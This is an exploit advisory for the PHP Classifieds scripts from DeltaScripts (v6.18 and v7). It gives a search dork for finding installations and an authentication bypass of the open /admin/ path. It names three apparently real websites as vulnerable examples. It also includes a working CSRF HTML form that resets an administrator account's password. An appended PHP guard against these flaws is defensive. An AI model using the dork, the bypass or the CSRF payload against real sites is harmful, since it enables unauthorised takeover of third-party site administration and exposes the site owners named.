
deltascripts Group (PHP Classifieds v.6.18,v.7) Multiple Vulnerabilities

Author: AtT4CKxT3rR0r1ST, Published: 15-06-2013

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.deltascripts.com/phpclassifieds
####################################################################
PHP Classifieds v. 6.18
=======================
===[ Exploit ]===

.:. Dork : intitle:"PHP Classifieds from DeltaScripts" inurl:"/admin/"

Auth Bypass
============
www.site.com/admin/

Go to this path [www.site.com/admin/]: the admin panel does not require a username or password.

Example:

http://autoactiv.3x.ro/anunturi/admin/
http://www.aviacaoexperimental.com/fotos_aviacao/classificados1/admin/
http://www.colclassifieds.com/admin/


PHP Classifieds v 7
====================
===[ Exploit ]===

CSRF Vulnerabilities (Add Admin)
================================

<html>
<head>
<title>PHP Classifieds [Add Admin]</title>
</head>
<body>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/admin_users.php">
<input type="hidden" name="adm_id" value="1"/>
<input type="hidden" name="adm_name" value="admin"/>
<input type="hidden" name="adm_pass" value="123456"/>
<input type="hidden" name="adm_level" value="0"/>
<input type="hidden" name="update" value="Update"/>
</form>

</body>
</html>

<input type="hidden" name="adm_id" value="1"/> ----------> adm_id= 1 or 2
####################################################################
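
A server-side guard for the two issues described above (the admin panel reachable without a login in v6.18, and the forgeable POST to admin_users.php in v7), given as an added example that is not from this advisory or from DeltaScripts. The function names, the session keys admin_id and csrf_token, and the csrf_token form field are assumptions.

```php
<?php
// Added example: hypothetical guard for an admin form handler such as
// admin/admin_users.php. Helper names and session keys are assumptions.
declare(strict_types=1);

// SameSite=Strict stops the browser attaching the session cookie to cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// Issue one random token per session; the admin form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Decide whether a state-changing admin request may proceed.
// Returns an HTTP status: 200 allow, 401 no admin session, 405 wrong method, 403 bad token.
function check_admin_request(array $session, string $method, array $post): int
{
    if (empty($session['admin_id'])) {
        return 401; // no logged-in admin: covers the open /admin/ path
    }
    if ($method !== 'POST') {
        return 405;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = (string)($session['csrf_token'] ?? '');
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 403; // a cross-site form cannot know the per-session token
    }
    return 200;
}

$status = check_admin_request($_SESSION, $_SERVER['REQUEST_METHOD'] ?? 'GET', $_POST);
if ($status !== 200) {
    http_response_code($status);
    exit('Request rejected');
}
// Only past this point should the handler read adm_id, adm_name,
// adm_pass and adm_level and apply the update.
```

The admin form would emit the token with a hidden field whose value is `csrf_token()`, so a request built on another site fails the 403 check even when the victim's browser holds a valid admin session.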